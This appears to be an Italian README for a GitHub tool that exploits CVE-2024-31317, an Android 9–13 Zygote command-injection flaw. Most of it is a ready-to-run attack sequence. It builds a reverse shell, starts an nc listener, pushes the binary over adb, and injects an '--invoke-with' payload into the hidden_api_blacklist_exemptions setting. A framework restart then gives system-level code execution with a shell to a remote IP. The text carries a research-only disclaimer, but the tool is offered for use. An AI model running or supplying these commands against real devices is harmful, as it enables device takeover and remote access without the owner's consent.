
CVE-2024-31317 Strumento di ricerca e distribuzione per la vulnerabilità di iniezione di comandi Zygote su Android | Framework di sfruttamento per Android 9-13
Questo progetto è destinato esclusivamente a scopi di ricerca sulla sicurezza e didattici. L'utilizzo di questo strumento per test non autorizzati è illegale. L'autore non si assume alcuna responsabilità per abusi o danni.
CVE-2024-31317 è una grave vulnerabilità di sicurezza che interessa i dispositivi Android dalla versione 9 alla 13, consentendo a un'applicazione con il permesso WRITE_SECURE_SETTINGS di ottenere l'esecuzione a livello di sistema tramite iniezione di comandi.
Questo progetto fornisce un'analisi tecnica dettagliata della vulnerabilità, un codice di proof-of-concept e strumenti di distribuzione automatizzata.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# Avviare il listener
nc -lvnp 4444
# Inviare ed eseguire
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# Iniettare il payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# Attivare la vulnerabilità
adb shell stop && adb shell start
Questo progetto è destinato esclusivamente a scopi di ricerca sulla sicurezza e didattici. Utilizzando questo strumento, accetti di:
Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli
fcy10012 - GitHub
Progetto di riferimento: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ Se questo progetto ti è stato utile, dagli una stella!